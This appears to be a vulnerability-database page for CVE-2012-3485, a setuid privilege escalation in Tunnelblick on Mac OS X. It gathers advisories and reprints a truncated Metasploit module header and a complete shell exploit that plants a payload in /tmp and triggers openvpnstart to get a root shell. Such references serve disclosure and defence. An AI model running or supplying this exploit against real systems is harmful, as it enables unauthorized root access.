CVE-2012-3485
published 2012-08-26CVE-2012-3485: Tunnelblick 3.3beta20 and earlier relies on argv[0] to determine the name of an appropriate (1) kernel module pathname or (2) executable file pathname, which…
PriorityP336high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
3.78%
88.6th percentile
Tunnelblick 3.3beta20 and earlier relies on argv[0] to determine the name of an appropriate (1) kernel module pathname or (2) executable file pathname, which allows local users to gain privileges via an execl system call.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tunnelblick | <= 3.3beta20 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rvmj-pg73-4rvj: The errorExitIfAttackViaString function in Tunnelblick 3
ghsa_unreviewed·2022-05-17·CVSS 7.2
CVE-2012-4676 [HIGH] CWE-59 GHSA-rvmj-pg73-4rvj: The errorExitIfAttackViaString function in Tunnelblick 3
The errorExitIfAttackViaString function in Tunnelblick 3.3beta20 and earlier allows local users to delete arbitrary files by constructing a (1) symlink or (2) hard link, a different vulnerability than CVE-2012-3485.
GHSA
GHSA-5x92-v869-v38r: Tunnelblick 3
ghsa_unreviewed·2022-05-17
CVE-2012-3485 [HIGH] CWE-20 GHSA-5x92-v869-v38r: Tunnelblick 3
Tunnelblick 3.3beta20 and earlier relies on argv[0] to determine the name of an appropriate (1) kernel module pathname or (2) executable file pathname, which allows local users to gain privileges via an execl system call.
No detection rules found.
Exploit-DB
Tunnelblick - Setuid Privilege Escalation (Metasploit)
exploitdb·2013-03-05
CVE-2012-3485 Tunnelblick - Setuid Privilege Escalation (Metasploit)
Tunnelblick - Setuid Privilege Escalation (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/exploit/exe'
class Metasploit4 'Setuid Tunnelblick Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The
vulnerability exists in the setuid openvpnstart, where an insufficient
validation of path names allows execution of arbitrary shell scripts as root.
This module has been tested successfully on Tunnelblick 3.2.8 build 289
Exploit-DB
Tunnelblick - Local Privilege Escalation (2)
exploitdb·2012-08-11
CVE-2012-3485 Tunnelblick - Local Privilege Escalation (2)
Tunnelblick - Local Privilege Escalation (2)
---
#!/bin/sh
#### Pwnnel Blicker ####
# for kids #
# #
# zx2c4 #
# #
########################
# This is another exploit for Tunnel Blick.
# Other exploits for Tunnel Blick are available here:
# http://git.zx2c4.com/Pwnnel-Blicker/tree/
echo "[+] Making vulnerable directory."
mkdir -pv /tmp/pwn/openvpn/openvpn-0
echo "[+] Preparing payload."
cat > /tmp/pwn/openvpn/openvpn-0/openvpn <<_EOF
#!/bin/sh
echo "[+] Cleaning up."
rm -rfv /tmp/pwn
echo "[+] Getting root."
exec bash
_EOF
chmod -v +x /tmp/pwn/openvpn/openvpn-0/openvpn
echo "[+] Creating symlink."
ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start
echo "[+] Triggering vulnerable program."
exec /tmp/pwn/start OpenVPNInfo 0
Metasploit
Setuid Tunnelblick Privilege Escalation
metasploit
Setuid Tunnelblick Privilege Escalation
Setuid Tunnelblick Privilege Escalation
This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The vulnerability exists in the setuid openvpnstart, where an insufficient validation of path names allows execution of arbitrary shell scripts as root. This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099 over Mac OS X 10.7.5.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2012-08/0122.htmlhttp://code.google.com/p/tunnelblick/issues/detail?id=212http://git.zx2c4.com/Pwnnel-Blicker/tree/pwnnel-blicker-for-kids.shhttp://www.exploit-db.com/exploits/24578http://www.openwall.com/lists/oss-security/2012/08/14/1http://archives.neohapsis.com/archives/fulldisclosure/2012-08/0122.htmlhttp://code.google.com/p/tunnelblick/issues/detail?id=212http://git.zx2c4.com/Pwnnel-Blicker/tree/pwnnel-blicker-for-kids.shhttp://www.exploit-db.com/exploits/24578http://www.openwall.com/lists/oss-security/2012/08/14/1
2012-08-26
Published